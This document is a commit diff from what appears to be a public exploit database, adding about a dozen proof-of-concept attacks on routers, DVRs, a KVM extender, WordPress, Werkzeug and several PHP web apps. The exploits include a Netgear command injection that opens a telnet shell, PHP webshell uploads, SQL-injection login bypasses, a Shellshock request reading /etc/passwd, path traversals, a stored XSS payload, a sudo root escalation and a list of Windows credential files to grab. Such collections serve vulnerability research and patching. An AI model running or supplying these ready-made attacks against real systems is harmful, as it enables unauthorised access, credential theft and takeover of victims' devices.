DB: 2021-07-07

13 changes to exploits/shellcodes Huawei dg8045 - Authentication Bypass WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) Black Box Kvm Extender 3.4.31307 - Local File Inclusion Pallets Werkzeug 0.15.4 - Path Traversal Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
2021-07-07 05:02:02 +00:00 · 2021-07-07 05:02:02 +00:00 · 1514ca02a7
commit 1514ca02a7
parent 540825f140
13 changed files with 792 additions and 46 deletions
--- a/exploits/hardware/webapps/50059.txt
+++ b/exploits/hardware/webapps/50059.txt
@ -1,45 +0,0 @@
-# Title: Huawei dg8045 - Authentication Bypass
-# Date: 2020-06-24
-# Author: Abdalrahman Gamal
-# Vendor Homepage: www.huawei.com
-# Version: dg8045
-# Hardware Version: VER.A
-
-#POC:
-
-The default password of this router is the last 8 characters of the
-device's serial number which exist in the back of the device.
-
-An attacker can leak the serial number via the web app API like the
-following:
-
-************************Request************************
-GET /api/system/deviceinfo HTTP/1.1
-Host: 192.168.1.1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
-Gecko/20100101 Firefox/65.0
-Accept: application/json, text/javascript, */*; q=0.01
-Accept-Language: en-US,en;q=0.5
-Accept-Encoding: gzip, deflate
-Referer: https://192.168.1.1/
-X-Requested-With: XMLHttpRequest
-Connection: close
-
-
-************************Response************************
-HTTP/1.1 200 OK
-Cache-Control: no-cache, no-store, max-age=0, must-revalidate
-X-Download-Options: noopen
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-Date: Thu, 24 Jun 2021 02:07 GMT+2
-Connection: Keep-Alive
-Content-Language: en
-Content-Type: application/javascript
-Content-Length: 141
-
-while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/
-
-
-
-You can use that serial number last 8 char/digits to login to the router.
--- a/exploits/hardware/webapps/50099.py
+++ b/exploits/hardware/webapps/50099.py
@ -0,0 +1,72 @@
+# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
+# Date: 02.07.2021
+# Exploit Author: SivertPL
+# Vendor Homepage: https://www.netgear.com/
+# Version: All prior to v1.0.0.60
+
+#!/usr/bin/python
+
+"""
+NETGEAR DGN2200v1 Unauthenticated Remote Command Execution
+
+Author: SivertPL (kroppoloe@protonmail.ch)
+Date: 02.07.2021
+Status: Patched in some models
+Version: All prior to v1.0.0.60
+Impact: Critical 
+
+CVE: No CVE number assigned
+PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365
+
+
+References: 
+    1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
+    2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
+
+
+The exploit script only works on UNIX-based systems.
+
+This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
+This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.
+
+"""
+
+import sys
+import requests
+import os
+
+target_ip = "192.168.0.1"
+telnet_port = 666
+sent = False
+
+def main():
+    if len(sys.argv) < 3:
+        print "./dgn2200_pwn.py <router ip> <backdoor-port>"
+        exit()
+
+    target_ip = sys.argv[1]
+    telnet_port = int(sys.argv[2])
+    print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
+    send_payload()
+    print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
+    print "[!] If it fails to connect it means the target is probably not vulnerable"
+    spawn_shell()
+
+def send_payload():
+    try:
+        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
+        sent = True
+    except Exception:
+        sent = False
+        print "[-] Unknown error, target might not be vulnerable."
+
+def spawn_shell():
+    if sent:
+        print "[+] Dropping a shell..."
+        os.system("telnet " + target_ip + " " + telnet_port)
+    else:
+        exit()
+
+
+if __name__ == "__main__":
+    main()
--- a/exploits/hardware/webapps/50100.py
+++ b/exploits/hardware/webapps/50100.py
@ -0,0 +1,23 @@
+# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
+# Date: 05.07.2021
+# Exploit Author: Ferhat Çil
+# Vendor Homepage: http://www.blackbox.com/
+# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
+# Version: 3.4.31307
+# Category: Webapps
+# Tested on: Linux
+# Description: Any user can read files from the server
+# without authentication due to an existing LFI in the following path:
+# http://target//cgi-bin/show?page=FilePath
+
+import requests
+import sys
+
+if name == 'main':
+    if len(sys.argv) == 3:
+        url = sys.argv[1]
+        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
+        r = requests.get(payload)
+        print(r.text)
+    else:
+        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
--- a/exploits/hardware/webapps/50104.txt
+++ b/exploits/hardware/webapps/50104.txt
@ -0,0 +1,11 @@
+# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
+# Date: 2021-07-05
+# Exploit Author: Andrea D'Ubaldo
+# Vendor Homepage: https://visual-tools.com/
+# Version: Visual Tools VX16 v4.2.28.0
+# Tested on: VX16 Embedded Linux 2.6.35.4.
+
+#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.
+
+sudo mount -o bind /bin/sh /bin/mount
+sudo mount
--- a/exploits/multiple/webapps/50097.txt
+++ b/exploits/multiple/webapps/50097.txt
@ -0,0 +1,140 @@
+# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
+# Date: 05/07/2021
+# Exploit Author: Alhasan Abbas (exploit.msf)
+# Vendor Homepage: https://www.perfexcrm.com/
+# Version: 1.10
+# Tested on: windows 10
+
+Vunlerable page: /clients/profile
+
+POC:
+----
+POST /clients/profile HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058
+
+Content-Length: 1548
+
+Origin: http://localhost
+
+Connection: close
+
+Referer: http://localhost/clients/profile
+
+Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038
+
+Upgrade-Insecure-Requests: 1
+
+
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="profile"
+
+
+
+1
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="profile_image"; filename=""
+
+Content-Type: application/octet-stream
+
+
+
+
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="firstname"
+
+
+
+adfgsg
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="lastname"
+
+
+
+fsdgfdg
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="company"
+
+
+
+test
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="vat"
+
+
+
+1
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="phonenumber"
+
+
+
+
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="country"
+
+
+
+105
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="city"
+
+
+
+asdf
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="address"
+
+
+
+asdf
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="zip"
+
+
+
+313
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="state"
+
+
+
+""><body onload=alert("XSS")>">
+
+-----------------------------325278703021926100783634528058--
+
+then any one open profile page in user the xss its executed
--- a/exploits/multiple/webapps/50098.txt
+++ b/exploits/multiple/webapps/50098.txt
@ -0,0 +1,10 @@
+# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
+# Date: 2021-07-05
+# Exploit Author: Andrea D'Ubaldo
+# Vendor Homepage: https://visual-tools.com/
+# Version: Visual Tools VX16 v4.2.28.0
+# Tested on: VX16 Embedded Linux 2.6.35.4.
+
+# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
+
+curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
--- a/exploits/php/webapps/50102.py
+++ b/exploits/php/webapps/50102.py
@ -0,0 +1,68 @@
+# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 06.07.2021
+# Exploit Author: Talha DEMİRSOY
+# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
+# Version: V 1.0
+# Tested on: Linux & Windows
+
+import requests
+import random
+import string
+from bs4 import BeautifulSoup
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+randstr = ''.join(random.choice(let) for i in range(15))
+
+payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =
+($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
+
+url = input("Target : ")
+
+session = requests.session()
+
+reqUrl = url + "login.php"
+reqHead = {"Content-Type": "application/x-www-form-urlencoded"}
+reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}
+session.post(reqUrl, headers=reqHead, data=reqData)
+
+print("Shell Uploading...")
+
+reqUrl = url + "php_action/createProduct.php"
+reqHead = {"Content-Type": "multipart/form-data;
+boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}
+reqData =
+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data; name=\"productImage\";
+filename=\""+shellname+".php\"\r\nContent-Type:
+application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
+form-data;
+name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n"
+session.post(reqUrl, headers=reqHead, data=reqData)
+
+print("product name is "+randstr)
+print("shell name is "+shellname)
+
+reqUrl = url + "product.php"
+data = session.get(reqUrl)
+
+parser = BeautifulSoup(data.text, 'html.parser')
+find_shell = parser.find_all('img')
+
+for i in find_shell:
+    if shellname in i.get("src"):
+        print("Shell URL : " + url  + i.get("src") + "?cmd=whoami")
--- a/exploits/php/webapps/50103.php
+++ b/exploits/php/webapps/50103.php
@ -0,0 +1,119 @@
+# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)
+# Date: 06/07/2021
+# Exploit Author: Thamer Almohammadi (@Thamerz88)
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
+# Version: 1.0
+# Tested on: Kali Linux
+
+# Proof of Concept :
+
+1- Send Request to /pages/save_user.php.
+2- Find your shell.php file path and try any command.
+
+
+################################## REQUEST ###############################
+POST /pages/save_user.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877
+Content-Length: 369
+-----------------------------3767690350396265302394702877
+Content-Disposition: form-data; name="image"; filename="shell.php"
+Content-Type: application/x-php
+<?php
+
+system($_GET['cmd']);
+
+?>
+-----------------------------3767690350396265302394702877
+
+Content-Disposition: form-data; name="btn_save"
+
+-----------------------------3767690350396265302394702877--
+
+
+
+
+################################## RESPONSE #############################
+HTTP/1.1 200 OK
+Date: Tue, 06 Jul 2021 02:16:18 GMT
+Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/7.3.28
+Content-Length: 1529
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+################################## Exploit #############################
+<?php
+// Coder By Thamer Almohammadi(@Thamerz88);
+function exploit($scheme,$host,$path,$shell){
+    $url=$scheme."://".$host.$path;
+    $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
+    $data    = "-----------------------------3767690350396265302394702877\r\n";
+    $data   .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n";
+    $data   .= "Content-Type: image/gif\r\n\r\n";
+    $data   .= "$content\r\n";
+    $data   .= "-----------------------------3767690350396265302394702877\r\n";
+
+    $data    .= "-----------------------------3767690350396265302394702877\r\n";
+    $data   .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n";
+    $data   .= "\r\n";
+    $data   .= "-----------------------------3767690350396265302394702877\r\n";
+
+    $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n";
+    $packet .= "Host: $host\r\n";
+    $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
+    $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
+    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
+    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
+    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n";
+    $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
+    $packet .= $data;
+    $packet .= "\r\n";
+    send($host, $packet);
+    sleep(2);
+    check($url,$shell);
+}
+function send($host, $packet)
+{
+        if ($connect = @fsockopen ($host, 80, $x, $y, 3))
+        {
+                @fputs ($connect, $packet);
+                @fclose ($connect);
+        }
+
+}
+
+function check($url,$shell){
+    $check=file_get_contents($url."/uploadImage/Profile/".$shell);
+    $preg=preg_match('/(File To Upload)/', $check, $output);
+    if($output[0] == "File To Upload"){
+        echo "[+] Upload shell successfully.. :D\n"; 
+        echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; 
+        }
+    else{ //Exploit Failed
+        echo "[-] Exploit Failed..\n"; 
+    }
+
+
+}
+$options=getopt("u:s:");
+if(!isset($options['u'], $options['s'])) 
+die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n 
+-u http://target.com   = Target URL ..
+-s shell.php           = Shell Name ..\n\n");  
+$url=$options["u"];
+$shell=$options["s"];
+$parse=parse_url($url);
+$host=$parse['host'];
+$path=$parse['path'];
+$scheme=$parse['scheme'];
+exploit($scheme,$host,$path,$shell);
+
+?>
--- a/exploits/php/webapps/50105.txt
+++ b/exploits/php/webapps/50105.txt
@ -0,0 +1,38 @@
+# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)
+# Date: 2021-07-06
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
+# Version: 1.0
+# Tested on: Windows 10, XAMPP
+
+
+###########
+# PoC     #
+###########
+
+Request:
+========
+
+POST /osms/Execute/ExLogin.php HTTP/1.1
+Host: localhost
+Content-Length: 43
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/osms/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+Username=or+1%3D1%2F*&Password=or+1%3D1%2F*
+
+
+Payload:
+=========
+
+Username=or 1=1/*
+Password=or 1=1/*
--- a/exploits/php/webapps/50106.txt
+++ b/exploits/php/webapps/50106.txt
@ -0,0 +1,161 @@
+# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
+# Date: 2021-07-06
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
+# Version: 1.0
+# Tested on: Windows 10, XAMPP
+
+
+###########
+# PoC 1:  #
+###########
+
+Request:
+========
+
+POST /osms/Execute/ExAddProduct.php HTTP/1.1
+Host: localhost
+Content-Length: 2160
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/osms/AddNewProduct.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
+Connection: close
+
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductName"
+
+camera
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="BrandName"
+
+soskod
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductPrice"
+
+12
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Quantity"
+
+1
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="TotalPrice"
+
+12
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="DisplaySize"
+
+15
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="OperatingSystem"
+
+windows
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Processor"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="InternalMemory"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="RAM"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="CameraDescription"
+
+lens
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="BatteryLife"
+
+3300
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Weight"
+
+500
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Model"
+
+AIG34
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Dimension"
+
+5 inch
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ASIN"
+
+9867638
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
+Content-Type: application/octet-stream
+
+<?php echo "result: ";system($_GET['rev']); ?>
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="date2"
+
+2020-06-03
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Description"
+
+accept
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="_wysihtml5_mode"
+
+1
+------WebKitFormBoundaryIBZWMUliFtu0otJ0--
+
+
+
+###########
+# PoC 2:  #
+###########
+
+Request:
+========
+
+POST /osms/Execute/ExChangePicture.php HTTP/1.1
+Host: localhost
+Content-Length: 463
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/osms/UserProfile.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
+Connection: close
+
+------WebKitFormBoundary4Dm8cGBqGNansHqI
+Content-Disposition: form-data; name="IDUser"
+
+6
+------WebKitFormBoundary4Dm8cGBqGNansHqI
+Content-Disposition: form-data; name="Image"; filename="rev.php"
+Content-Type: application/octet-stream
+
+<?php echo "output: ";system($_GET['rev']); ?>
+------WebKitFormBoundary4Dm8cGBqGNansHqI--
+
+
+
+###########
+# Access: #
+###########
+
+# Webshell access via:
+PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
+PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami
+
+# Output:
+result: windows10\user
--- a/exploits/php/webapps/50107.py
+++ b/exploits/php/webapps/50107.py
@ -0,0 +1,11 @@
+# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
+# Date: 05.07.2021
+# Exploit Author: TheSmuggler
+# Vendor Homepage: https://gotmls.net/
+# Software Link: https://gotmls.net/downloads/
+# Version: <= 4.20.72
+# Tested on: Windows
+
+import requests
+
+print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
--- a/exploits/python/webapps/50101.py
+++ b/exploits/python/webapps/50101.py
@ -0,0 +1,128 @@
+# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal
+# Date: 06 July 2021
+# Original Author: Emre ÖVÜNÇ
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://palletsprojects.com/
+# Software Link: https://github.com/pallets/werkzeug
+# Version: Prior to 0.15.5
+# Tested on: Windows Server
+# CVE: 2019-14322
+# Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue
+# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322
+# Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/
+
+Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download.
+
+#!/usr/bin/env python3
+# PoC code by @faisalfs10x [https://github.com/faisalfs10x]
+
+""" $ pip3 install colorama==0.3.3, argparse, requests, urllib3
+    $ python3 CVE-2019-14322.py -l list_target.txt"
+"""
+import argparse
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+import requests
+from colorama import Fore, Back, Style, init
+
+# Colors
+red = '\033[91m'
+green = '\033[92m'
+white = '\033[97m'
+yellow = '\033[93m'
+bold = '\033[1m'
+end = '\033[0m'
+
+init(autoreset=True)
+
+def banner_motd():
+    print(Fore.CYAN +Style.BRIGHT +"""                                                                
+
+        CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s 
+""" % (bold, red, white, yellow, white, end))
+
+banner_motd()
+
+# list of sensitive files to grab in windows
+
+# %windir%\repair\sam
+# %windir%\System32\config\RegBack\SAM
+# %windir%\repair\system
+# %windir%\repair\software
+# %windir%\repair\security
+# %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
+# %windir%\iis6.log (5,6 or 7)
+# %windir%\system32\logfiles\httperr\httperr1.log
+# C:\sysprep.inf
+# C:\sysprep\sysprep.inf
+# C:\sysprep\sysprep.xml
+# %windir%\Panther\Unattended.xml
+# C:\inetpub\wwwroot\Web.config
+# %windir%\system32\config\AppEvent.Evt (Application log)
+# %windir%\system32\config\SecEvent.Evt (Security log)
+# %windir%\system32\config\default.sav
+# %windir%\system32\config\security.sav
+# %windir%\system32\config\software.sav
+# %windir%\system32\config\system.sav
+# %windir%\system32\inetsrv\config\applicationHost.config
+# %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
+# %windir%\System32\drivers\etc\hosts (dns entries)
+# %windir%\System32\drivers\etc\networks (network settings)
+# %windir%\system32\config\SAM
+# TLDR:
+# C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml
+# C:/windows/system32/inetsrv/config/applicationHost.config
+# C:/windows/system32/logfiles/httperr/httperr1.log 
+# C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account)
+# C:/windows/system32/drivers/etc/hosts - (dns entries)
+# C:/windows/system32/drivers/etc/networks - (network settings)
+
+def check(url):
+
+	# There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :)
+	for endpoint in [
+			'https://{}/base_import/static/c:/windows/win.ini', 
+			#'https://{}/web/static/c:/windows/win.ini', 
+			#'https://{}/base/static/c:/windows/win.ini'
+			]:
+		try:
+
+			url2 = endpoint.format(url)
+			resp = requests.get(url2, verify=False, timeout=5)
+			
+			if 'fonts' and 'files' and 'extensions' in resp.text:
+				print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]")
+				with open('CVE-2019-14322_result.txt', 'a+') as output:
+					output.write('{}\n'.format(url2))
+					output.close()
+
+			else:
+				print(" [-] " +url+ " : not vulnerable")
+
+		except KeyboardInterrupt:
+			exit('User aborted!')
+		except:
+			print(" [-] " +url+ " : not vulnerable")
+
+
+def main(args):
+
+    f = open(listfile, "r")
+    for w in f:
+        url = w.strip()
+            
+        check(url)
+    
+if __name__ == '__main__':
+
+    try:
+
+        parser = argparse.ArgumentParser(description='CVE-2019-14322')
+        parser.add_argument("-l","--targetlist",required=True, help = "target list in file")
+        args = parser.parse_args()
+        listfile = args.targetlist
+
+        main(args)
+
+    except KeyboardInterrupt:
+        exit('User aborted!')
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44204,7 +44204,7 @@ id,file,description,date,author,type,platform,port
 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,
 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
-50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,
+50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
